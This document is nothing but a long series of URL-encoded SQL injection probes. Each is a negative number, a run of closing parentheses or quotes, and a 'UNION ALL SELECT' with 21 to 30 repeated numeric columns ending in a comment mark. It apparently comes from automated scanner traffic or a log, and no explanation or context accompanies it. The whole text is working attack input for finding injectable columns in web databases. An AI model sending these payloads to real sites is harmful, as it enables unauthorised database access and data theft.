-4094%29%29%20UNION%20ALL%20SELECT%205486%2C5486%2C5486%2C5486%2C5486%2C5486%2C5486%2C5486%2C5486%2C5486%2C5486%2C5486%2C5486%2C5486%2C5486%2C5486%2C5486%2C5486%2C5486%2C5486%2C5486%2C5486%2C5486%2C5486%2C5486%2C5486%23 -3218%29%29%20UNION%20ALL%20SELECT%206138%2C6138%2C6138%2C6138%2C6138%2C6138%2C6138%2C6138%2C6138%2C6138%2C6138%2C6138%2C6138%2C6138%2C6138%2C6138%2C6138%2C6138%2C6138%2C6138%2C6138%2C6138%2C6138%2C6138%2C6138%2C6138%2C6138%23 -4304%29%29%20UNION%20ALL%20SELECT%206533%2C6533%2C6533%2C6533%2C6533%2C6533%2C6533%2C6533%2C6533%2C6533%2C6533%2C6533%2C6533%2C6533%2C6533%2C6533%2C6533%2C6533%2C6533%2C6533%2C6533%2C6533%2C6533%2C6533%2C6533%2C6533%2C6533%2C6533%23 -2432%29%29%20UNION%20ALL%20SELECT%205376%2C5376%2C5376%2C5376%2C5376%2C5376%2C5376%2C5376%2C5376%2C5376%2C5376%2C5376%2C5376%2C5376%2C5376%2C5376%2C5376%2C5376%2C5376%2C5376%2C5376%2C5376%2C5376%2C5376%2C5376%2C5376%2C5376%2C5376%2C5376%23 -4985%29%29%20UNION%20ALL%20SELECT%207746%2C7746%2C7746%2C7746%2C7746%2C7746%2C7746%2C7746%2C7746%2C7746%2C7746%2C7746%2C7746%2C7746%2C7746%2C7746%2C7746%2C7746%2C7746%2C7746%2C7746%2C7746%2C7746%2C7746%2C7746%2C7746%2C7746%2C7746%2C7746%2C7746%23 -1564%29%29%29%20UNION%20ALL%20SELECT%205954%2C5954%2C5954%2C5954%2C5954%2C5954%2C5954%2C5954%2C5954%2C5954%2C5954%2C5954%2C5954%2C5954%2C5954%2C5954%2C5954%2C5954%2C5954%2C5954%2C5954%23 -6985%29%29%29%20UNION%20ALL%20SELECT%207754%2C7754%2C7754%2C7754%2C7754%2C7754%2C7754%2C7754%2C7754%2C7754%2C7754%2C7754%2C7754%2C7754%2C7754%2C7754%2C7754%2C7754%2C7754%2C7754%2C7754%2C7754%23 -1425%29%29%29%20UNION%20ALL%20SELECT%207206%2C7206%2C7206%2C7206%2C7206%2C7206%2C7206%2C7206%2C7206%2C7206%2C7206%2C7206%2C7206%2C7206%2C7206%2C7206%2C7206%2C7206%2C7206%2C7206%2C7206%2C7206%2C7206%23 -7404%29%29%29%20UNION%20ALL%20SELECT%205319%2C5319%2C5319%2C5319%2C5319%2C5319%2C5319%2C5319%2C5319%2C5319%2C5319%2C5319%2C5319%2C5319%2C5319%2C5319%2C5319%2C5319%2C5319%2C5319%2C5319%2C5319%2C5319%2C5319%23 -9495%29%29%29%20UNION%20ALL%20SELECT%209869%2C9869%2C9869%2C9869%2C9869%2C9869%2C9869%2C9869%2C9869%2C9869%2C9869%2C9869%2C9869%2C9869%2C9869%2C9869%2C9869%2C9869%2C9869%2C9869%2C9869%2C9869%2C9869%2C9869%2C9869%23 -6460%29%29%29%20UNION%20ALL%20SELECT%206907%2C6907%2C6907%2C6907%2C6907%2C6907%2C6907%2C6907%2C6907%2C6907%2C6907%2C6907%2C6907%2C6907%2C6907%2C6907%2C6907%2C6907%2C6907%2C6907%2C6907%2C6907%2C6907%2C6907%2C6907%2C6907%23 -1957%29%29%29%20UNION%20ALL%20SELECT%201512%2C1512%2C1512%2C1512%2C1512%2C1512%2C1512%2C1512%2C1512%2C1512%2C1512%2C1512%2C1512%2C1512%2C1512%2C1512%2C1512%2C1512%2C1512%2C1512%2C1512%2C1512%2C1512%2C1512%2C1512%2C1512%2C1512%23 -6508%29%29%29%20UNION%20ALL%20SELECT%203257%2C3257%2C3257%2C3257%2C3257%2C3257%2C3257%2C3257%2C3257%2C3257%2C3257%2C3257%2C3257%2C3257%2C3257%2C3257%2C3257%2C3257%2C3257%2C3257%2C3257%2C3257%2C3257%2C3257%2C3257%2C3257%2C3257%2C3257%23 -9759%29%29%29%20UNION%20ALL%20SELECT%206648%2C6648%2C6648%2C6648%2C6648%2C6648%2C6648%2C6648%2C6648%2C6648%2C6648%2C6648%2C6648%2C6648%2C6648%2C6648%2C6648%2C6648%2C6648%2C6648%2C6648%2C6648%2C6648%2C6648%2C6648%2C6648%2C6648%2C6648%2C6648%23 -6702%29%29%29%20UNION%20ALL%20SELECT%206037%2C6037%2C6037%2C6037%2C6037%2C6037%2C6037%2C6037%2C6037%2C6037%2C6037%2C6037%2C6037%2C6037%2C6037%2C6037%2C6037%2C6037%2C6037%2C6037%2C6037%2C6037%2C6037%2C6037%2C6037%2C6037%2C6037%2C6037%2C6037%2C6037%23 -8731%20UNION%20ALL%20SELECT%207648%2C7648%2C7648%2C7648%2C7648%2C7648%2C7648%2C7648%2C7648%2C7648%2C7648%2C7648%2C7648%2C7648%2C7648%2C7648%2C7648%2C7648%2C7648%2C7648%2C7648%23 -4846%20UNION%20ALL%20SELECT%209416%2C9416%2C9416%2C9416%2C9416%2C9416%2C9416%2C9416%2C9416%2C9416%2C9416%2C9416%2C9416%2C9416%2C9416%2C9416%2C9416%2C9416%2C9416%2C9416%2C9416%2C9416%23 -8670%20UNION%20ALL%20SELECT%206367%2C6367%2C6367%2C6367%2C6367%2C6367%2C6367%2C6367%2C6367%2C6367%2C6367%2C6367%2C6367%2C6367%2C6367%2C6367%2C6367%2C6367%2C6367%2C6367%2C6367%2C6367%2C6367%23 -3440%20UNION%20ALL%20SELECT%209666%2C9666%2C9666%2C9666%2C9666%2C9666%2C9666%2C9666%2C9666%2C9666%2C9666%2C9666%2C9666%2C9666%2C9666%2C9666%2C9666%2C9666%2C9666%2C9666%2C9666%2C9666%2C9666%2C9666%23 -7233%20UNION%20ALL%20SELECT%202183%2C2183%2C2183%2C2183%2C2183%2C2183%2C2183%2C2183%2C2183%2C2183%2C2183%2C2183%2C2183%2C2183%2C2183%2C2183%2C2183%2C2183%2C2183%2C2183%2C2183%2C2183%2C2183%2C2183%2C2183%23 -4628%20UNION%20ALL%20SELECT%201688%2C1688%2C1688%2C1688%2C1688%2C1688%2C1688%2C1688%2C1688%2C1688%2C1688%2C1688%2C1688%2C1688%2C1688%2C1688%2C1688%2C1688%2C1688%2C1688%2C1688%2C1688%2C1688%2C1688%2C1688%2C1688%23 -7074%20UNION%20ALL%20SELECT%201472%2C1472%2C1472%2C1472%2C1472%2C1472%2C1472%2C1472%2C1472%2C1472%2C1472%2C1472%2C1472%2C1472%2C1472%2C1472%2C1472%2C1472%2C1472%2C1472%2C1472%2C1472%2C1472%2C1472%2C1472%2C1472%2C1472%23 -6481%20UNION%20ALL%20SELECT%205773%2C5773%2C5773%2C5773%2C5773%2C5773%2C5773%2C5773%2C5773%2C5773%2C5773%2C5773%2C5773%2C5773%2C5773%2C5773%2C5773%2C5773%2C5773%2C5773%2C5773%2C5773%2C5773%2C5773%2C5773%2C5773%2C5773%2C5773%23 -3355%20UNION%20ALL%20SELECT%207499%2C7499%2C7499%2C7499%2C7499%2C7499%2C7499%2C7499%2C7499%2C7499%2C7499%2C7499%2C7499%2C7499%2C7499%2C7499%2C7499%2C7499%2C7499%2C7499%2C7499%2C7499%2C7499%2C7499%2C7499%2C7499%2C7499%2C7499%2C7499%23 -8160%20UNION%20ALL%20SELECT%205806%2C5806%2C5806%2C5806%2C5806%2C5806%2C5806%2C5806%2C5806%2C5806%2C5806%2C5806%2C5806%2C5806%2C5806%2C5806%2C5806%2C5806%2C5806%2C5806%2C5806%2C5806%2C5806%2C5806%2C5806%2C5806%2C5806%2C5806%2C5806%2C5806%23 -3520%27%29%20UNION%20ALL%20SELECT%202497%2C2497%2C2497%2C2497%2C2497%2C2497%2C2497%2C2497%2C2497%2C2497%2C2497%2C2497%2C2497%2C2497%2C2497%2C2497%2C2497%2C2497%2C2497%2C2497%2C2497%23 -4442%27%29%20UNION%20ALL%20SELECT%203915%2C3915%2C3915%2C3915%2C3915%2C3915%2C3915%2C3915%2C3915%2C3915%2C3915%2C3915%2C3915%2C3915%2C3915%2C3915%2C3915%2C3915%2C3915%2C3915%2C3915%2C3915%23 -4184%27%29%20UNION%20ALL%20SELECT%205133%2C5133%2C5133%2C5133%2C5133%2C5133%2C5133%2C5133%2C5133%2C5133%2C5133%2C5133%2C5133%2C5133%2C5133%2C5133%2C5133%2C5133%2C5133%2C5133%2C5133%2C5133%2C5133%23 -1682%27%29%20UNION%20ALL%20SELECT%206838%2C6838%2C6838%2C6838%2C6838%2C6838%2C6838%2C6838%2C6838%2C6838%2C6838%2C6838%2C6838%2C6838%2C6838%2C6838%2C6838%2C6838%2C6838%2C6838%2C6838%2C6838%2C6838%2C6838%23 -8604%27%29%20UNION%20ALL%20SELECT%206810%2C6810%2C6810%2C6810%2C6810%2C6810%2C6810%2C6810%2C6810%2C6810%2C6810%2C6810%2C6810%2C6810%2C6810%2C6810%2C6810%2C6810%2C6810%2C6810%2C6810%2C6810%2C6810%2C6810%2C6810%23 -9117%27%29%20UNION%20ALL%20SELECT%208417%2C8417%2C8417%2C8417%2C8417%2C8417%2C8417%2C8417%2C8417%2C8417%2C8417%2C8417%2C8417%2C8417%2C8417%2C8417%2C8417%2C8417%2C8417%2C8417%2C8417%2C8417%2C8417%2C8417%2C8417%2C8417%23 -4692%27%29%20UNION%20ALL%20SELECT%207670%2C7670%2C7670%2C7670%2C7670%2C7670%2C7670%2C7670%2C7670%2C7670%2C7670%2C7670%2C7670%2C7670%2C7670%2C7670%2C7670%2C7670%2C7670%2C7670%2C7670%2C7670%2C7670%2C7670%2C7670%2C7670%2C7670%23 -5073%27%29%20UNION%20ALL%20SELECT%208240%2C8240%2C8240%2C8240%2C8240%2C8240%2C8240%2C8240%2C8240%2C8240%2C8240%2C8240%2C8240%2C8240%2C8240%2C8240%2C8240%2C8240%2C8240%2C8240%2C8240%2C8240%2C8240%2C8240%2C8240%2C8240%2C8240%2C8240%23 -1317%27%29%20UNION%20ALL%20SELECT%203773%2C3773%2C3773%2C3773%2C3773%2C3773%2C3773%2C3773%2C3773%2C3773%2C3773%2C3773%2C3773%2C3773%2C3773%2C3773%2C3773%2C3773%2C3773%2C3773%2C3773%2C3773%2C3773%2C3773%2C3773%2C3773%2C3773%2C3773%2C3773%23 -9460%27%29%20UNION%20ALL%20SELECT%201226%2C1226%2C1226%2C1226%2C1226%2C1226%2C1226%2C1226%2C1226%2C1226%2C1226%2C1226%2C1226%2C1226%2C1226%2C1226%2C1226%2C1226%2C1226%2C1226%2C1226%2C1226%2C1226%2C1226%2C1226%2C1226%2C1226%2C1226%2C1226%2C1226%23 -2278%27%29%29%20UNION%20ALL%20SELECT%202967%2C2967%2C2967%2C2967%2C2967%2C2967%2C2967%2C2967%2C2967%2C2967%2C2967%2C2967%2C2967%2C2967%2C2967%2C2967%2C2967%2C2967%2C2967%2C2967%2C2967%23 -6825%27%29%29%20UNION%20ALL%20SELECT%205941%2C5941%2C5941%2C5941%2C5941%2C5941%2C5941%2C5941%2C5941%2C5941%2C5941%2C5941%2C5941%2C5941%2C5941%2C5941%2C5941%2C5941%2C5941%2C5941%2C5941%2C5941%23 -1380%27%29%29%20UNION%20ALL%20SELECT%205387%2C5387%2C5387%2C5387%2C5387%2C5387%2C5387%2C5387%2C5387%2C5387%2C5387%2C5387%2C5387%2C5387%2C5387%2C5387%2C5387%2C5387%2C5387%2C5387%2C5387%2C5387%2C5387%23 -6762%27%29%29%20UNION%20ALL%20SELECT%209258%2C9258%2C9258%2C9258%2C9258%2C9258%2C9258%2C9258%2C9258%2C9258%2C9258%2C9258%2C9258%2C9258%2C9258%2C9258%2C9258%2C9258%2C9258%2C9258%2C9258%2C9258%2C9258%2C9258%23 -9361%27%29%29%20UNION%20ALL%20SELECT%208828%2C8828%2C8828%2C8828%2C8828%2C8828%2C8828%2C8828%2C8828%2C8828%2C8828%2C8828%2C8828%2C8828%2C8828%2C8828%2C8828%2C8828%2C8828%2C8828%2C8828%2C8828%2C8828%2C8828%2C8828%23 -4279%27%29%29%20UNION%20ALL%20SELECT%209683%2C9683%2C9683%2C9683%2C9683%2C9683%2C9683%2C9683%2C9683%2C9683%2C9683%2C9683%2C9683%2C9683%2C9683%2C9683%2C9683%2C9683%2C9683%2C9683%2C9683%2C9683%2C9683%2C9683%2C9683%2C9683%23 -2283%27%29%29%20UNION%20ALL%20SELECT%207911%2C7911%2C7911%2C7911%2C7911%2C7911%2C7911%2C7911%2C7911%2C7911%2C7911%2C7911%2C7911%2C7911%2C7911%2C7911%2C7911%2C7911%2C7911%2C7911%2C7911%2C7911%2C7911%2C7911%2C7911%2C7911%2C7911%23 -5058%27%29%29%20UNION%20ALL%20SELECT%206671%2C6671%2C6671%2C6671%2C6671%2C6671%2C6671%2C6671%2C6671%2C6671%2C6671%2C6671%2C6671%2C6671%2C6671%2C6671%2C6671%2C6671%2C6671%2C6671%2C6671%2C6671%2C6671%2C6671%2C6671%2C6671%2C6671%2C6671%23 -7081%27%29%29%20UNION%20ALL%20SELECT%201595%2C1595%2C1595%2C1595%2C1595%2C1595%2C1595%2C1595%2C1595%2C1595%2C1595%2C1595%2C1595%2C1595%2C1595%2C1595%2C1595%2C1595%2C1595%2C1595%2C1595%2C1595%2C1595%2C1595%2C1595%2C1595%2C1595%2C1595%2C1595%23 -5406%27%29%29%20UNION%20ALL%20SELECT%208943%2C8943%2C8943%2C8943%2C8943%2C8943%2C8943%2C8943%2C8943%2C8943%2C8943%2C8943%2C8943%2C8943%2C8943%2C8943%2C8943%2C8943%2C8943%2C8943%2C8943%2C8943%2C8943%2C8943%2C8943%2C8943%2C8943%2C8943%2C8943%2C8943%23 -1407%27%29%29%29%20UNION%20ALL%20SELECT%203252%2C3252%2C3252%2C3252%2C3252%2C3252%2C3252%2C3252%2C3252%2C3252%2C3252%2C3252%2C3252%2C3252%2C3252%2C3252%2C3252%2C3252%2C3252%2C3252%2C3252%23 -3718%27%29%29%29%20UNION%20ALL%20SELECT%208850%2C8850%2C8850%2C8850%2C8850%2C8850%2C8850%2C8850%2C8850%2C8850%2C8850%2C8850%2C8850%2C8850%2C8850%2C8850%2C8850%2C8850%2C8850%2C8850%2C8850%2C8850%23 -7720%27%29%29%29%20UNION%20ALL%20SELECT%202233%2C2233%2C2233%2C2233%2C2233%2C2233%2C2233%2C2233%2C2233%2C2233%2C2233%2C2233%2C2233%2C2233%2C2233%2C2233%2C2233%2C2233%2C2233%2C2233%2C2233%2C2233%2C2233%23 -4096%27%29%29%29%20UNION%20ALL%20SELECT%207271%2C7271%2C7271%2C7271%2C7271%2C7271%2C7271%2C7271%2C7271%2C7271%2C7271%2C7271%2C7271%2C7271%2C7271%2C7271%2C7271%2C7271%2C7271%2C7271%2C7271%2C7271%2C7271%2C7271%23 -2062%27%29%29%29%20UNION%20ALL%20SELECT%208758%2C8758%2C8758%2C8758%2C8758%2C8758%2C8758%2C8758%2C8758%2C8758%2C8758%2C8758%2C8758%2C8758%2C8758%2C8758%2C8758%2C8758%2C8758%2C8758%2C8758%2C8758%2C8758%2C8758%2C8758%23 -8031%27%29%29%29%20UNION%20ALL%20SELECT%205735%2C5735%2C5735%2C5735%2C5735%2C5735%2C5735%2C5735%2C5735%2C5735%2C5735%2C5735%2C5735%2C5735%2C5735%2C5735%2C5735%2C5735%2C5735%2C5735%2C5735%2C5735%2C5735%2C5735%2C5735%2C5735%23 -5235%27%29%29%29%20UNION%20ALL%20SELECT%207582%2C7582%2C7582%2C7582%2C7582%2C7582%2C7582%2C7582%2C7582%2C7582%2C7582%2C7582%2C7582%2C7582%2C7582%2C7582%2C7582%2C7582%2C7582%2C7582%2C7582%2C7582%2C7582%2C7582%2C7582%2C7582%2C7582%23 -9244%27%29%29%29%20UNION%20ALL%20SELECT%208180%2C8180%2C8180%2C8180%2C8180%2C8180%2C8180%2C8180%2C8180%2C8180%2C8180%2C8180%2C8180%2C8180%2C8180%2C8180%2C8180%2C8180%2C8180%2C8180%2C8180%2C8180%2C8180%2C8180%2C8180%2C8180%2C8180%2C8180%23 -2763%27%29%29%29%20UNION%20ALL%20SELECT%206425%2C6425%2C6425%2C6425%2C6425%2C6425%2C6425%2C6425%2C6425%2C6425%2C6425%2C6425%2C6425%2C6425%2C6425%2C6425%2C6425%2C6425%2C6425%2C6425%2C6425%2C6425%2C6425%2C6425%2C6425%2C6425%2C6425%2C6425%2C6425%23 -5934%27%29%29%29%20UNION%20ALL%20SELECT%202734%2C2734%2C2734%2C2734%2C2734%2C2734%2C2734%2C2734%2C2734%2C2734%2C2734%2C2734%2C2734%2C2734%2C2734%2C2734%2C2734%2C2734%2C2734%2C2734%2C2734%2C2734%2C2734%2C2734%2C2734%2C2734%2C2734%2C2734%2C2734%2C2734%23 -7333%27%20UNION%20ALL%20SELECT%206480%2C6480%2C6480%2C6480%2C6480%2C6480%2C6480%2C6480%2C6480%2C6480%2C6480%2C6480%2C6480%2C6480%2C6480%2C6480%2C6480%2C6480%2C6480%2C6480%2C6480%23 -7986%27%20UNION%20ALL%20SELECT%203943%2C3943%2C3943%2C3943%2C3943%2C3943%2C3943%2C3943%2C3943%2C3943%2C3943%2C3943%2C3943%2C3943%2C3943%2C3943%2C3943%2C3943%2C3943%2C3943%2C3943%2C3943%23 -9008%27%20UNION%20ALL%20SELECT%207489%2C7489%2C7489%2C7489%2C7489%2C7489%2C7489%2C7489%2C7489%2C7489%2C7489%2C7489%2C7489%2C7489%2C7489%2C7489%2C7489%2C7489%2C7489%2C7489%2C7489%2C7489%2C7489%23 -9024%27%20UNION%20ALL%20SELECT%207263%2C7263%2C7263%2C7263%2C7263%2C7263%2C7263%2C7263%2C7263%2C7263%2C7263%2C7263%2C7263%2C7263%2C7263%2C7263%2C7263%2C7263%2C7263%2C7263%2C7263%2C7263%2C7263%2C7263%23 -7580%27%20UNION%20ALL%20SELECT%201359%2C1359%2C1359%2C1359%2C1359%2C1359%2C1359%2C1359%2C1359%2C1359%2C1359%2C1359%2C1359%2C1359%2C1359%2C1359%2C1359%2C1359%2C1359%2C1359%2C1359%2C1359%2C1359%2C1359%2C1359%23 -2095%27%20UNION%20ALL%20SELECT%202883%2C2883%2C2883%2C2883%2C2883%2C2883%2C2883%2C2883%2C2883%2C2883%2C2883%2C2883%2C2883%2C2883%2C2883%2C2883%2C2883%2C2883%2C2883%2C2883%2C2883%2C2883%2C2883%2C2883%2C2883%2C2883%23 -5924%27%20UNION%20ALL%20SELECT%204597%2C4597%2C4597%2C4597%2C4597%2C4597%2C4597%2C4597%2C4597%2C4597%2C4597%2C4597%2C4597%2C4597%2C4597%2C4597%2C4597%2C4597%2C4597%2C4597%2C4597%2C4597%2C4597%2C4597%2C4597%2C4597%2C4597%23 -3011%27%20UNION%20ALL%20SELECT%201461%2C1461%2C1461%2C1461%2C1461%2C1461%2C1461%2C1461%2C1461%2C1461%2C1461%2C1461%2C1461%2C1461%2C1461%2C1461%2C1461%2C1461%2C1461%2C1461%2C1461%2C1461%2C1461%2C1461%2C1461%2C1461%2C1461%2C1461%23 -6119%27%20UNION%20ALL%20SELECT%201360%2C1360%2C1360%2C1360%2C1360%2C1360%2C1360%2C1360%2C1360%2C1360%2C1360%2C1360%2C1360%2C1360%2C1360%2C1360%2C1360%2C1360%2C1360%2C1360%2C1360%2C1360%2C1360%2C1360%2C1360%2C1360%2C1360%2C1360%2C1360%23 -9448%27%20UNION%20ALL%20SELECT%201836%2C1836%2C1836%2C1836%2C1836%2C1836%2C1836%2C1836%2C1836%2C1836%2C1836%2C1836%2C1836%2C1836%2C1836%2C1836%2C1836%2C1836%2C1836%2C1836%2C1836%2C1836%2C1836%2C1836%2C1836%2C1836%2C1836%2C1836%2C1836%2C1836%23 -9009%27%29%20UNION%20ALL%20SELECT%209143%2C9143%2C9143%2C9143%2C9143%2C9143%2C9143%2C9143%2C9143%2C9143%2C9143%2C9143%2C9143%2C9143%2C9143%2C9143%2C9143%2C9143%2C9143%2C9143%2C9143%23 -5562%27%29%20UNION%20ALL%20SELECT%204653%2C4653%2C4653%2C4653%2C4653%2C4653%2C4653%2C4653%2C4653%2C4653%2C4653%2C4653%2C4653%2C4653%2C4653%2C4653%2C4653%2C4653%2C4653%2C4653%2C4653%2C4653%23 -3664%27%29%20UNION%20ALL%20SELECT%202696%2C2696%2C2696%2C2696%2C2696%2C2696%2C2696%2C2696%2C2696%2C2696%2C2696%2C2696%2C2696%2C2696%2C2696%2C2696%2C2696%2C2696%2C2696%2C2696%2C2696%2C2696%2C2696%23 -7755%27%29%20UNION%20ALL%20SELECT%202614%2C2614%2C2614%2C2614%2C2614%2C2614%2C2614%2C2614%2C2614%2C2614%2C2614%2C2614%2C2614%2C2614%2C2614%2C2614%2C2614%2C2614%2C2614%2C2614%2C2614%2C2614%2C2614%2C2614%23 -8992%27%29%20UNION%20ALL%20SELECT%206698%2C6698%2C6698%2C6698%2C6698%2C6698%2C6698%2C6698%2C6698%2C6698%2C6698%2C6698%2C6698%2C6698%2C6698%2C6698%2C6698%2C6698%2C6698%2C6698%2C6698%2C6698%2C6698%2C6698%2C6698%23 -4069%27%29%20UNION%20ALL%20SELECT%203694%2C3694%2C3694%2C3694%2C3694%2C3694%2C3694%2C3694%2C3694%2C3694%2C3694%2C3694%2C3694%2C3694%2C3694%2C3694%2C3694%2C3694%2C3694%2C3694%2C3694%2C3694%2C3694%2C3694%2C3694%2C3694%23 -3047%27%29%20UNION%20ALL%20SELECT%203998%2C3998%2C3998%2C3998%2C3998%2C3998%2C3998%2C3998%2C3998%2C3998%2C3998%2C3998%2C3998%2C3998%2C3998%2C3998%2C3998%2C3998%2C3998%2C3998%2C3998%2C3998%2C3998%2C3998%2C3998%2C3998%2C3998%23 -7961%27%29%20UNION%20ALL%20SELECT%208504%2C8504%2C8504%2C8504%2C8504%2C8504%2C8504%2C8504%2C8504%2C8504%2C8504%2C8504%2C8504%2C8504%2C8504%2C8504%2C8504%2C8504%2C8504%2C8504%2C8504%2C8504%2C8504%2C8504%2C8504%2C8504%2C8504%2C8504%23 -7469%27%29%20UNION%20ALL%20SELECT%207420%2C7420%2C7420%2C7420%2C7420%2C7420%2C7420%2C7420%2C7420%2C7420%2C7420%2C7420%2C7420%2C7420%2C7420%2C7420%2C7420%2C7420%2C7420%2C7420%2C7420%2C7420%2C7420%2C7420%2C7420%2C7420%2C7420%2C7420%2C7420%23 -9505%27%29%20UNION%20ALL%20SELECT%201426%2C1426%2C1426%2C1426%2C1426%2C1426%2C1426%2C1426%2C1426%2C1426%2C1426%2C1426%2C1426%2C1426%2C1426%2C1426%2C1426%2C1426%2C1426%2C1426%2C1426%2C1426%2C1426%2C1426%2C1426%2C1426%2C1426%2C1426%2C1426%2C1426%23 -7876%27%29%29%20UNION%20ALL%20SELECT%209071%2C9071%2C9071%2C9071%2C9071%2C9071%2C9071%2C9071%2C9071%2C9071%2C9071%2C9071%2C9071%2C9071%2C9071%2C9071%2C9071%2C9071%2C9071%2C9071%2C9071%23 -5321%27%29%29%20UNION%20ALL%20SELECT%206395%2C6395%2C6395%2C6395%2C6395%2C6395%2C6395%2C6395%2C6395%2C6395%2C6395%2C6395%2C6395%2C6395%2C6395%2C6395%2C6395%2C6395%2C6395%2C6395%2C6395%2C6395%23 -9457%27%29%29%20UNION%20ALL%20SELECT%202379%2C2379%2C2379%2C2379%2C2379%2C2379%2C2379%2C2379%2C2379%2C2379%2C2379%2C2379%2C2379%2C2379%2C2379%2C2379%2C2379%2C2379%2C2379%2C2379%2C2379%2C2379%2C2379%23 -5766%27%29%29%20UNION%20ALL%20SELECT%206766%2C6766%2C6766%2C6766%2C6766%2C6766%2C6766%2C6766%2C6766%2C6766%2C6766%2C6766%2C6766%2C6766%2C6766%2C6766%2C6766%2C6766%2C6766%2C6766%2C6766%2C6766%2C6766%2C6766%23 -9615%27%29%29%20UNION%20ALL%20SELECT%203954%2C3954%2C3954%2C3954%2C3954%2C3954%2C3954%2C3954%2C3954%2C3954%2C3954%2C3954%2C3954%2C3954%2C3954%2C3954%2C3954%2C3954%2C3954%2C3954%2C3954%2C3954%2C3954%2C3954%2C3954%23 -1672%27%29%29%20UNION%20ALL%20SELECT%209794%2C9794%2C9794%2C9794%2C9794%2C9794%2C9794%2C9794%2C9794%2C9794%2C9794%2C9794%2C9794%2C9794%2C9794%2C9794%2C9794%2C9794%2C9794%2C9794%2C9794%2C9794%2C9794%2C9794%2C9794%2C9794%23 -7098%27%29%29%20UNION%20ALL%20SELECT%205615%2C5615%2C5615%2C5615%2C5615%2C5615%2C5615%2C5615%2C5615%2C5615%2C5615%2C5615%2C5615%2C5615%2C5615%2C5615%2C5615%2C5615%2C5615%2C5615%2C5615%2C5615%2C5615%2C5615%2C5615%2C5615%2C5615%23 -4843%27%29%29%20UNION%20ALL%20SELECT%202735%2C2735%2C2735%2C2735%2C2735%2C2735%2C2735%2C2735%2C2735%2C2735%2C2735%2C2735%2C2735%2C2735%2C2735%2C2735%2C2735%2C2735%2C2735%2C2735%2C2735%2C2735%2C2735%2C2735%2C2735%2C2735%2C2735%2C2735%23 -3195%27%29%29%20UNION%20ALL%20SELECT%208552%2C8552%2C8552%2C8552%2C8552%2C8552%2C8552%2C8552%2C8552%2C8552%2C8552%2C8552%2C8552%2C8552%2C8552%2C8552%2C8552%2C8552%2C8552%2C8552%2C8552%2C8552%2C8552%2C8552%2C8552%2C8552%2C8552%2C8552%2C8552%23 -6131%27%29%29%20UNION%20ALL%20SELECT%209645%2C9645%2C9645%2C9645%2C9645%2C9645%2C9645%2C9645%2C9645%2C9645%2C9645%2C9645%2C9645%2C9645%2C9645%2C9645%2C9645%2C9645%2C9645%2C9645%2C9645%2C9645%2C9645%2C9645%2C9645%2C9645%2C9645%2C9645%2C9645%2C9645%23 -9129%27%29%29%29%20UNION%20ALL%20SELECT%207921%2C7921%2C7921%2C7921%2C7921%2C7921%2C7921%2C7921%2C7921%2C7921%2C7921%2C7921%2C7921%2C7921%2C7921%2C7921%2C7921%2C7921%2C7921%2C7921%2C7921%23 -3841%27%29%29%29%20UNION%20ALL%20SELECT%203949%2C3949%2C3949%2C3949%2C3949%2C3949%2C3949%2C3949%2C3949%2C3949%2C3949%2C3949%2C3949%2C3949%2C3949%2C3949%2C3949%2C3949%2C3949%2C3949%2C3949%2C3949%23 -4516%27%29%29%29%20UNION%20ALL%20SELECT%208389%2C8389%2C8389%2C8389%2C8389%2C8389%2C8389%2C8389%2C8389%2C8389%2C8389%2C8389%2C8389%2C8389%2C8389%2C8389%2C8389%2C8389%2C8389%2C8389%2C8389%2C8389%2C8389%23 -3681%27%29%29%29%20UNION%20ALL%20SELECT%209154%2C9154%2C9154%2C9154%2C9154%2C9154%2C9154%2C9154%2C9154%2C9154%2C9154%2C9154%2C9154%2C9154%2C9154%2C9154%2C9154%2C9154%2C9154%2C9154%2C9154%2C9154%2C9154%2C9154%23 -6823%27%29%29%29%20UNION%20ALL%20SELECT%201450%2C1450%2C1450%2C1450%2C1450%2C1450%2C1450%2C1450%2C1450%2C1450%2C1450%2C1450%2C1450%2C1450%2C1450%2C1450%2C1450%2C1450%2C1450%2C1450%2C1450%2C1450%2C1450%2C1450%2C1450%23 -5210%27%29%29%29%20UNION%20ALL%20SELECT%206922%2C6922%2C6922%2C6922%2C6922%2C6922%2C6922%2C6922%2C6922%2C6922%2C6922%2C6922%2C6922%2C6922%2C6922%2C6922%2C6922%2C6922%2C6922%2C6922%2C6922%2C6922%2C6922%2C6922%2C6922%2C6922%23 -2526%27%29%29%29%20UNION%20ALL%20SELECT%208425%2C8425%2C8425%2C8425%2C8425%2C8425%2C8425%2C8425%2C8425%2C8425%2C8425%2C8425%2C8425%2C8425%2C8425%2C8425%2C8425%2C8425%2C8425%2C8425%2C8425%2C8425%2C8425%2C8425%2C8425%2C8425%2C8425%23 -6722%27%29%29%29%20UNION%20ALL%20SELECT%202949%2C2949%2C2949%2C2949%2C2949%2C2949%2C2949%2C2949%2C2949%2C2949%2C2949%2C2949%2C2949%2C2949%2C2949%2C2949%2C2949%2C2949%2C2949%2C2949%2C2949%2C2949%2C2949%2C2949%2C2949%2C2949%2C2949%2C2949%23 -7983%27%29%29%29%20UNION%20ALL%20SELECT%203978%2C3978%2C3978%2C3978%2C3978%2C3978%2C3978%2C3978%2C3978%2C3978%2C3978%2C3978%2C3978%2C3978%2C3978%2C3978%2C3978%2C3978%2C3978%2C3978%2C3978%2C3978%2C3978%2C3978%2C3978%2C3978%2C3978%2C3978%2C3978%23 -2567%27%29%29%29%20UNION%20ALL%20SELECT%204976%2C4976%2C4976%2C4976%2C4976%2C4976%2C4976%2C4976%2C4976%2C4976%2C4976%2C4976%2C4976%2C4976%2C4976%2C4976%2C4976%2C4976%2C4976%2C4976%2C4976%2C4976%2C4976%2C4976%2C4976%2C4976%2C4976%2C4976%2C4976%2C4976%23 -6888%27%20UNION%20ALL%20SELECT%201817%2C1817%2C1817%2C1817%2C1817%2C1817%2C1817%2C1817%2C1817%2C1817%2C1817%2C1817%2C1817%2C1817%2C1817%2C1817%2C1817%2C1817%2C1817%2C1817%2C1817%23 -9113%27%20UNION%20ALL%20SELECT%202279%2C2279%2C2279%2C2279%2C2279%2C2279%2C2279%2C2279%2C2279%2C2279%2C2279%2C2279%2C2279%2C2279%2C2279%2C2279%2C2279%2C2279%2C2279%2C2279%2C2279%2C2279%23 -6073%27%20UNION%20ALL%20SELECT%208992%2C8992%2C8992%2C8992%2C8992%2C8992%2C8992%2C8992%2C8992%2C8992%2C8992%2C8992%2C8992%2C8992%2C8992%2C8992%2C8992%2C8992%2C8992%2C8992%2C8992%2C8992%2C8992%23 